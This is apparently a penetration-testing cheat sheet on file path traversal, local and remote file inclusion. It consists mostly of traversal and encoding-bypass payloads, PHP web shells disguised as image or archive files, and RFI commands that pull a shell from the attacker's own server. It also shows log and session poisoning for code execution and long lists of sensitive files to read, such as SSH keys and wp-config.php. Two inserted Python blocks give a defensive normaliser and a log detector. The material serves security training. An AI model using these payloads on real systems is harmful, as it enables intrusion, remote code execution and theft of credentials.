File path traversal/Local File Inclusion
Last updated
Wordlists: Windows, Linux, Awesome Wordlist
| Language | Function                   | Read Content | Execute | Remote URL |
|----------|----------------------------|--------------|---------|------------|
| PHP      | include() / include_once() | Yes          | Yes     | Yes        |
| PHP      | require() / require_once() | Yes          | Yes     | No         |
| PHP      | file_get_contents()        | Yes          | No      | Yes        |
| PHP      | fopen() / file()           | Yes          | No      | No         |
| NodeJS   | fs.readFile()              | Yes          | No      | No         |
| NodeJS   | fs.sendFile()              | Yes          | No      | No         |
| NodeJS   | res.render()               | Yes          | Yes     | No         |
| Java     | include                    | Yes          | No      | No         |
| Java     | import                     | Yes          | Yes     | Yes        |
| .NET     | @Html.Partial()            | Yes          | No      | No         |
| .NET     | @Html.RemotePartial()      | Yes          | No      | Yes        |
| .NET     | Response.WriteFile()       | Yes          | No      | No         |
| .NET     | include                    | Yes          | Yes     | Yes        |
#Basic LFI
http://example.com/index.php?page=../../../etc/passwd
#Null Byte
http://example.com/index.php?page=../../../etc/passwd%00
http://example.com/index.php?page=../../../etc/passwd%00.png
#Double Encoding
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
#UTF-8 Encoding
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
#Path Truncation
http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE]
http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd
#Filter Bypass
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
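Added example, not part of the original cheat-sheet: a Python normaliser that undoes the encodings listed above (double encoding, overlong UTF-8, null byte, backslash separators), a classifier a defender can run over logged parameter values, and the canonicalised in-directory check a safe include should perform instead of stripping `../` once (which is exactly what `....//` defeats). The pages directory is an assumed value.

```python
import os
import re
from typing import Optional
from urllib.parse import unquote

PAGES_DIR = "/var/www/html/pages"   # assumed include directory (constructed for this example)
SCHEMES = ("php:", "data:", "expect:", "zip:", "rar:", "phar:",
           "http:", "https:", "ftp:", "file:")

def canonicalize(raw: str) -> str:
    """Undo the encoding tricks from the bypass list so a check sees what the
    filesystem will see: overlong UTF-8 dots/slashes (%c0%ae, %c0%af), repeated
    percent-decoding (%252e -> %2e -> .), NUL truncation and backslashes (%5C)."""
    s = re.sub(r"%c0%ae", ".", raw, flags=re.IGNORECASE)
    s = re.sub(r"%c0%af", "/", s, flags=re.IGNORECASE)
    for _ in range(3):                  # bounded: handles double/triple encoding
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = s.split("\x00", 1)[0]           # C string APIs stop at the first NUL byte
    return s.replace("\\", "/")

def classify(raw: str) -> str:
    """Detection view: label a logged page/language value."""
    c = canonicalize(raw).lower()
    if raw.startswith("\\\\") or c.startswith(SCHEMES):
        return "wrapper-or-remote"      # php://, zip://, http://, UNC share ...
    if ".." in c:                       # also matches ....// and ..////// variants
        return "traversal"
    if c.startswith("/") or re.match(r"^[a-z]:/", c):
        return "absolute-path"
    return "benign"

def resolve_include(raw: str, base: str = PAGES_DIR) -> Optional[str]:
    """Hardened view: treat every value as relative to `base` and accept it only
    if the normalised path is still inside `base`; return None to reject."""
    rel = canonicalize(raw).lstrip("/")
    full = os.path.normpath(os.path.join(base, rel))
    return full if os.path.commonpath([base, full]) == base else None
```

Note that `....//....//etc/passwd` resolves to a harmless path inside the base directory: it only works against a filter that deletes `../` once, which the canonicalised check never does.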
Remote File Inclusion no longer works on a default configuration, because allow_url_include has been disabled by default since PHP 5.
#Create malicious File
Intrusionz3r0@htb[/htb]$ echo '<?php system($_GET["cmd"]); ?>' > shell.php
Intrusionz3r0@htb[/htb]$ echo 'GIF8<?php system($_GET[0]); ?>' > shell.gif
Intrusionz3r0@htb[/htb]$ echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php #output file
#Set up a server
Intrusionz3r0@htb[/htb]$ sudo python3 -m http.server <LISTENING_PORT>
Intrusionz3r0@htb[/htb]$ sudo python -m pyftpdlib -p 21
Intrusionz3r0@htb[/htb]$ impacket-smbserver -smb2support share $(pwd)
#Trigger the RFI through URL
Intrusionz3r0@htb[/htb]$ curl 'http://<SERVER_IP>:<PORT>/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id'
Intrusionz3r0@htb[/htb]$ curl 'http://<SERVER_IP>:<PORT>/index.php?language=ftp://user:pass@localhost/shell.php&cmd=id'
Intrusionz3r0@htb[/htb]$ curl 'http://<SERVER_IP>:<PORT>/index.php?language=\\\\<OUR_IP>\\share\\shell.php&cmd=whoami'
#Read Files and convert them into base64 to bypass restrictions
php://filter/read=convert.base64-encode/resource=<path-filename>
#Remote Code Execution Wrapper
data://text/plain;base64,<base64-string>&cmd=<command>
php://input&cmd=<command>
expect://<command>
#Upload LFI to RCE
#Zip File
Intrusionz3r0@htb[/htb]$ echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
Intrusionz3r0@htb[/htb]$ zip payload.zip payload.php;
Intrusionz3r0@htb[/htb]$ mv payload.zip shell.jpg;
Intrusionz3r0@htb[/htb]$ rm payload.php
zip://./profile_images/shell.jpg%23shell.php&cmd=id
#RAR File
Intrusionz3r0@htb[/htb]$ rar a payload.rar payload.php;
Intrusionz3r0@htb[/htb]$ mv payload.rar shell.jpg;
Intrusionz3r0@htb[/htb]$ rm payload.php
rar://./profile_images/shell.jpg%23shell.php&cmd=id
#PHAR malicious file
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
#Build the archive (the script above is saved as shell.php; phar.readonly must be off)
Intrusionz3r0@htb[/htb]$ php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
#Fuzzing parameters
Intrusionz3r0@htb[/htb]$ ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
#Fuzzing LFI paths Windows/Linux
Intrusionz3r0@htb[/htb]$ ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287
#Discover Server Webroot
Intrusionz3r0@htb[/htb]$ ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287
#Server logs and configuration (precise scan by using DragonJar wordlist)
Intrusionz3r0@htb[/htb]$ ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287
# Apache Logs
?page=/var/log/apache/access.log
?page=/var/log/apache/error.log
?page=/var/log/apache2/access.log
?page=/var/log/apache2/error.log
# Nginx Logs
?page=/var/log/nginx/access.log
?page=/var/log/nginx/error.log
?page=/usr/local/nginx/logs/access.log
?page=/usr/local/nginx/logs/error.log
# PHP Logs (Common in Apache/Nginx setups)
?page=/var/log/php_errors.log
?page=/etc/php/7.4/fpm/php-fpm.log
?page=/etc/php/8.0/fpm/php-fpm.log
# System Logs (SSH)
?page=/var/log/auth.log
?page=/var/log/secure
?page=/var/log/syslog
?page=/var/log/messages
# Custom Logs (Shared Hosting or Web Servers)
?page=/home/<username>/logs/error_log
?page=/home/<username>/logs/access_log
By default, Apache logs are located in /var/log/apache2/ on Linux and in C:\xampp\apache\logs\ on Windows, while Nginx logs are located in /var/log/nginx/ on Linux and in C:\nginx\log\ on Windows. The files of interest in each directory are access.log and error.log.
Payload: http://<SERVER_IP>:<PORT>/index.php?language=/var/log/apache2/access.log
Intrusionz3r0@htb[/htb]$ curl -s "http://<SERVER_IP>:<PORT>/index.php" -A "<?php system($_GET['cmd']); ?>"
Most PHP web applications use a PHPSESSID cookie, and the corresponding session data is stored in session files on the back end, saved at:
Linux: /var/lib/php/sessions/sess_<PHPSESSID>
Windows: C:\Windows\Temp\sess_<PHPSESSID>
The name of the file that contains our user's data matches the value of our PHPSESSID cookie with the sess_ prefix.
#Poison the session file by sending a PHP web shell as the parameter value
http://<SERVER_IP>:<PORT>/index.php?language=<?php%20system($_GET[0]);%20?>
#Read the poisoned session file through LFI
http://<SERVER_IP>:<PORT>/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&0=pwd
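Added example, not part of the original page: a Python detector for both poisoning routes described above (PHP tags arriving via User-Agent or URL, then an include parameter pointed at a log or session file), run over constructed Apache combined-format lines. The parameter names and sensitive-path list are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/Nginx "combined" log format; the last quoted field is the User-Agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)
INCLUDE_PARAMS = ("page", "language", "file", "view", "template")   # assumed names
SENSITIVE = ("/var/log/", "/var/lib/php/sessions/", "/proc/self/",
             "/windows/temp/", "/xampp/apache/logs/")

def inspect_line(line: str):
    """Return (client_ip, findings) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    target, ua = m["target"], m["ua"]
    # Poisoning step: PHP tags in a field the server writes to its log or session.
    if PHP_TAG.search(unquote(ua)) or PHP_TAG.search(unquote(target)):
        findings.append("php-tag-in-request")
    # Read-back step: an include parameter aimed at a log or session file.
    query = parse_qs(urlsplit(target).query)
    for param in INCLUDE_PARAMS:
        for value in query.get(param, []):
            low = unquote(value).replace("\\", "/").lower()
            if any(s in low for s in SENSITIVE):
                findings.append(f"{param}->sensitive-path")
            elif ".." in low or "://" in low:
                findings.append(f"{param}->traversal-or-wrapper")
    return m["ip"], findings

def scan(log_text: str):
    """All lines with at least one finding, as (ip, findings) in log order."""
    hits = []
    for line in log_text.splitlines():
        res = inspect_line(line)
        if res and res[1]:
            hits.append(res)
    return hits

# Constructed sample: one benign request, then the poison-and-read sequence.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?language=es HTTP/1.1" 200 2287 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php HTTP/1.1" 200 2287 "-" "<?php system($_GET['cmd']); ?>"
10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?language=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 8120 "-" "curl/7.88"
10.0.0.9 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&0=pwd HTTP/1.1" 200 2301 "-" "curl/7.88"
10.0.0.9 - - [10/Oct/2023:13:56:10 +0000] "GET /index.php?language=%3C%3Fphp%20system(%24_GET%5B0%5D)%3B%20%3F%3E HTTP/1.1" 200 2287 "-" "curl/7.88"
"""
```

A single alert on the first finding is enough to block the source before the read-back request turns a logged string into executed code.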
# Home directories
?page=/home/<username>/.bashrc
?page=/home/<username>/.bash_history
?page=/home/<username>/.bash_logout
?page=/home/<username>/.bash_profile
?page=/home/<username>/.profile
?page=/home/<username>/.ssh/id_rsa
# Root directory
?page=/root/.bashrc
?page=/root/.bash_history
?page=/root/.bash_logout
?page=/root/.bash_profile
?page=/root/.profile
?page=/root/.ssh/id_rsa
# System-wide configurations
?page=/etc/bash.bashrc
# OS
?page=/etc/lsb-release
?page=/etc/os-release
# Processes
?page=/proc/self/stat
?page=/proc/net/tcp
?page=/proc/self/cmdline
?page=/proc/self/environ
?page=/proc/self/fd/0
?page=/proc/self/fd/1
?page=/proc/<pid>/cmdline
?page=/proc/<pid>/environ
# Mail
?page=/var/mail/<username>
?page=/var/spool/mail/<username>
# Postfix
?page=/var/log/mail.log
?page=/var/log/maillog
# Host
?page=/etc/hosts
?page=/etc/hostname
# Cron
?page=/etc/crontab
# Web root
?page=/var/www/html/index.html
?page=/var/www/html/index.php
?page=/var/www/html/.htaccess
?page=/var/www/html/.htpasswd
?page=/var/www/example.com/index.php
?page=/var/www/subdomain/index.php
?page=/var/www/subdomain.example.com/index.php
?page=/var/www/wordpress/index.php
# Apache
?page=/etc/apache2/.htpasswd
?page=/etc/apache2/apache2.conf
?page=/etc/apache2/envvars
?page=/etc/apache2/ports.conf
?page=/etc/apache2/sites-available/domain.conf
?page=/etc/apache2/sites-available/example.com.conf
?page=/etc/apache2/sites-available/sub.example.com.conf
?page=/etc/apache2/sites-available/sub.conf
?page=/etc/apache2/sites-enabled/000-default.conf
?page=/etc/apache2/sites-enabled/domain.conf
?page=/etc/apache2/sites-enabled/example.com.conf
?page=/etc/apache2/sites-enabled/sub.example.com.conf
?page=/etc/apache2/sites-enabled/sub.conf
?page=/var/log/apache/access.log
?page=/var/log/apache/error.log
?page=/var/log/apache2/access.log
?page=/var/log/apache2/error.log
# Apache Tomcat
?page=/opt/tomcat/conf/tomcat-users.xml
?page=/opt/tomcat/logs/catalina.err
?page=/opt/tomcat/logs/catalina.out
# Nginx
?page=/var/log/nginx/access.log
?page=/var/log/nginx/error.log
?page=/etc/nginx/nginx.conf
?page=/etc/nginx/conf.d/.htpasswd
?page=/etc/nginx/conf.d/example.com.conf
?page=/etc/nginx/conf.d/example.conf
?page=/etc/nginx/conf.d/subdomain.example.com.conf
?page=/etc/nginx/conf.d/subdomain.conf
?page=/etc/nginx/sites-available/default
?page=/etc/nginx/sites-available/example.com.conf
?page=/etc/nginx/sites-enabled/default
?page=/etc/nginx/sites-enabled/example.com.conf
?page=/usr/local/nginx/conf/nginx.conf
?page=/usr/local/etc/nginx/nginx.conf
# PHP web conf (x.x is specified PHP version)
?page=/etc/php/x.x/apache2/php.ini
?page=/etc/php/x.x/cli/php.ini
?page=/etc/php/x.x/fpm/php.ini
# Flask
?page=index.html
?page=../__init__.py
?page=../app.py
?page=../db.py
?page=../main.py
?page=/home/<username>/<appname>/app.py
?page=/opt/<appname>/app.py
?page=/srv/<appname>/app.py
# BIND
?page=/etc/bind/named.conf
?page=/etc/bind/named.conf.options
?page=/etc/bind/named.conf.local
?page=/etc/bind/named.conf.default-zones
# Windows
?page=C:/Windows/debug/NetSetup.log
?page=C:/Windows/System32/drivers/etc/hosts
?page=C:/Windows/System32/inetsrv/config/applicationHost.config
?page=../../../../../../../../windows/system32/drivers/etc/hosts
?page=C:/Users/Public/Desktop/desktop.ini
?page=C:/Users/FUZZ/Desktop/desktop.ini # user enumeration
?page=C:/inetpub/wwwroot/<project>/web.config
?page=C:/xampp/apache/conf/httpd.conf
?page=C:/xampp/apache/conf/extra/httpd-userdir.conf
?page=C:/xampp/apache/conf/extra/httpd-vhosts.conf
?page=C:/xampp/apache/conf/extra/httpd-xampp.conf
?page=C:/xampp/apache/conf/extra/httpd-ajp.conf
?page=C:/xampp/apache/logs/access.log
?page=C:/xampp/apache/logs/error.log
?page=C:/xampp/cgi-bin/example.cgi
?page=C:/xampp/htdocs/example.com/index.php
?page=C:/xampp/htdocs/sub.example.com/index.php
?page=C:/xampp/phpMyAdmin/index.php
?page=C:/xampp/phpMyAdmin/config.inc.php
# WordPress Core Files
?page=wp-config.php
?page=.htaccess
?page=.user.ini
?page=wp-includes/version.php
?page=wp-content/themes/twentytwentyone/functions.php
?page=wp-content/themes/twentytwentythree/functions.php
?page=wp-content/plugins/hello.php
?page=wp-content/uploads/.htaccess
?page=wp-content/uploads/custom-image.jpg
# WordPress Database Configurations
?page=/var/www/html/wordpress/wp-config.php
?page=/var/www/wordpress/wp-config.php
?page=/var/www/example.com/wp-config.php
?page=/var/www/sub.example.com/wp-config.php
?page=/var/www/html/wordpress/wp-content/plugins/akismet/akismet.php
?page=/var/www/html/wordpress/wp-content/themes/twentytwenty/functions.php
# Backup Files
?page=/var/backups/wordpress.sql
?page=/var/backups/wordpress.zip
?page=/var/backups/db.sql
?page=/var/backups/wp-content.zip
# Logs and Debugging Files
?page=debug.log
?page=/var/www/html/wordpress/wp-content/debug.log
?page=/var/www/html/wordpress/wp-content/uploads/debug.log
?page=/var/log/apache2/access.log
?page=/var/log/apache2/error.log
?page=/var/log/nginx/access.log
?page=/var/log/nginx/error.log
# WordPress JSON REST API
?page=/wp-json/wp/v2/posts
?page=/wp-json/wp/v2/users
?page=/wp-json/wp/v2/pages
?page=/wp-json/wp/v2/media
# XMLRPC Files
?page=/xmlrpc.php
?page=/wp-includes/IXR/class-IXR.php
# Sensitive Directories
?page=/wp-content/
?page=/wp-admin/
?page=/wp-includes/
?page=/wp-content/uploads/
?page=/wp-content/plugins/
?page=/wp-content/themes/
# Plugins Configuration
?page=/wp-content/plugins/woocommerce/includes/class-wc-cart.php
?page=/wp-content/plugins/elementor/includes/plugin.php
?page=/wp-content/plugins/contact-form-7/includes/controller.php
# Themes Configuration
?page=/wp-content/themes/twentytwentyone/style.css
?page=/wp-content/themes/twentytwenty/functions.php
?page=/wp-content/themes/customtheme/style.css
# wp-cli
?page=/usr/local/bin/wp-cli.phar
# Cron Jobs
?page=/wp-cron.php
# System Configurations
?page=/etc/apache2/apache2.conf
?page=/etc/apache2/sites-enabled/000-default.conf
?page=/etc/nginx/sites-available/default
?page=/etc/nginx/sites-available/wordpress.conf
?page=/etc/php/7.4/apache2/php.ini
?page=/etc/php/8.0/apache2/php.ini
# Database Files
?page=/var/lib/mysql/wordpress/wp_users.MYD
?page=/var/lib/mysql/wordpress/wp_posts.MYD
?page=/var/lib/mysql/wordpress/wp_options.MYD
?page=/var/lib/mysql/mysql/user.MYD